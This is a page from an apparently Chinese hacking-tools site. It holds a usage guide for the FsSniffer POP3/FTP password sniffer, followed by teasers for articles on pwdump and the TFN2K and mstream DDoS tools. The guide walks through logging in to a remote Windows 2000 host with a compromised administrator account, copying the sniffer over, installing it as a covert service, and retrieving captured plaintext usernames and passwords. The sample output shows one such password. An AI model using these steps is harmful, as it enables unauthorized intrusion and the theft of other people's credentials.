流影 POP3/FTP Sniffer 说明

所属分类: 网络安全 / 工具使用 阅读数: 159
收藏 0 赞 0 分享
FsSniffer只能在Windows 2000中使用,可以捕捉到本机和基于非交换环境局域网的POP3/FTP用户名和密码。一、本地使用FSSNIFFER -S <Bind IP> <Port> <Control Password>Bind IP:指绑定的IP地址,通常就是本地主机IP地址。Port:控制的端口,以后要通过这个端口登陆上去查看结果。Control Password:登陆时的密码。登陆上去后的命令Show Result:查看捕获的记录Quit:退出ShutDown:结束Sniffer的运行二、远程使用例如:得到主机211.152.188.1的一个属于管理员组的帐号test:test,首先登录。D:\>net use \\211.152.188.1\ipc$ test /user:testThe command completed successfully.将fssniffer.exe复制到远程主机。(也可以用流光IV中提供的工具“种植者”来做这件事情)D:\>copy "d:\My Documents\ShadowSniffer\Release\FsSniffer.exe" \\211.152.188.1\dmin$1 file(s) copied. 利用流光IV中的NTCMD启动FsSniffer.EXE,并将器安装成为服务=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============Written by Assassin, http://www.netXeyes.com http://www.netXeyes.orgNTCMD>verMicrosoft Windows 2000 [Version 5.00.2195]NTCMD>fssniffer.exe -I test test ShadowSniffer 211.152.188.1 7 123456 Flux Shadow Sniffer(FTP/POP3) Edition, Written by Assassin 2001TestSniffer1 installed. NTCMD> 这样在远程主机上面安装了一个服务ShadowSniffer。用net命令启动服务NTCMD>net start shadowsnifferThe ShadowSniffer service is starting..The ShadowSniffer service was started successfully.安装成为服务的格式:FsSniffer -I <Username> <Password> <Service Name> <Bind Local IP> <Port> <Control Password>UserName:远程主机的用户名(必须具有超级用户权限)Passwod:远程主机的密码Service Name:安装的服务名称,如果安装失败,可以将FsSniffer.exe改名再试。Bind Local IP:远程主机的IP。某些主机具有两个IP地址,这是就需要根据需要选择监听的IP地址(例如:局域网和外网)Port:远程控制的端口Control Password:远程控制的密码过一段时间就可以登陆到FsSniffer开的端口7上面,查看结果了。D:>telnet 211.152.188.1 7Control Password: **************===============Banyet Soft Labs. 1995-2001 All Rights Reserved.========================Written by Assassin, Server Edition FluxShadow@21cn.com==================FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======Flux Shadow Sniffer>show result===========Flux Shadow Sniffer Edition Results===========211.152.188.112(1106)->211.152.188.1(8213) USER zjf211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.211.152.188.1(8199)->211.152.188.112(1107) USER zjf211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfvTotal 10 Sniffered======================================================小榕软件实验室&#8482; 1995-2001版权所有www.netXeyes.com www.netXeyes.orgdansnow@21cn.com
更多精彩内容其他人还在看

仅用windows自带的ftp.exe实现断点续传

动画下载地址: http://www.chinesehack.org/soft/book/goonftp-jc.rar建议使用全屏观看ftp断点续传(黑客进阶)hotmail出了一个题目 如果不使用 wget cuteftp 等ftp工具仅仅利用windows自带的ftp.ex
收藏 0 赞 0 分享

解除禁止下载

最近看到很多人问起关于如何在网吧中下载的问题,写了此贴,并不是鼓励去搞破坏。另外,如有说错的地方还请指出,不要误人子弟。由于每个网吧的安全设置都不一样,所以我将我知道的在这里说一下,遗漏之处还望补充。第一种:这种是最好解决的了,你可以点击IE(什么不
收藏 0 赞 0 分享

常用的Linux网络安全工具简介

常用的Linux网络安全工具简介   尽管各种版本的Linux distribution 附带了很多开放源代码的自由软件,但是仍然有大量的有用 的工具没有被默认包括在它们的安装光盘内,特别是有一些可以增强Linux网络安全的工具包,它 们大多也是开放源的自由软件。 这里简单地介绍
收藏 0 赞 0 分享

pwdump的使用方法

作者:kingboy 来源:中国鹰派联盟   不知道大家有没有用过pwdump这个工具,这是一个用来抓取NT、WIN2000的用户密码文档的工具,最新的pwdump3可以用来抓取WIN2000的密码档(因为WIN2000使用了SYSKEY,所以老的pwdump2无法抓取WI
收藏 0 赞 0 分享

DoS系列--分布式拒绝服务攻击工具mstream

DoS系列--分布式拒绝服务攻击工具mstream ☆ 简介 分布式拒绝服务攻击工具mstream是基于stream2.c源码的。目前为止有七种公认的分 布式拒绝服务攻击 trinoo [03] Tribe Flood Network (TFN) [04] Tribe Fl
收藏 0 赞 0 分享

NetXray使用说明总汇

标题:NetXray使用说明之(1)1.1.1.1----2.2.2.2----3.3.3.3----4.4.4.4 这是一个ShareHub连接下的局域网 | | 5.5.5.5 这是一个8080端口上的
收藏 0 赞 0 分享

网络刺客2使用指南

网络刺客2使用指南    “天行”推出网络刺客2已有一年,想当初此软件因其强大的功能被国内“黑”界推为惊世之作。我在得到它后,却有近半年时间在研究、寻找它的使用方法,呜呼哀哉~~此软件的“帮助说明”真的是太文不对题、让人不知所云了!现将此软件中的一些
收藏 0 赞 0 分享

冰河”启示录

冰河”启示录 作者: 陈经韬 前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)本人对"冰河"及其作者没有任何不满,相反,作者肯帮助初学者的态度是我们每一个人都应该学习的.(二)
收藏 0 赞 0 分享

tfn2k使用方法和对策(3)

    tfn2k使用方法和对策(3) 作者:佳佳 本来想再分两次写完本文,后来发现佳佳要翻译的两篇文章 http://packetstorm.securify.com/distributed/TFN2k_Analysis-1.3.txt http://pack
收藏 0 赞 0 分享

tfn2k使用方法和对策(2)

    tfn2k使用方法和对策(2) 作者:佳佳     佳佳继续上一次的文章,这一次是攻击测试。 测试环境:     共有5台机器,佳佳是在五台redhat linux6.2上测试的。     192.168.111.1     192.168.111.2
收藏 0 赞 0 分享
查看更多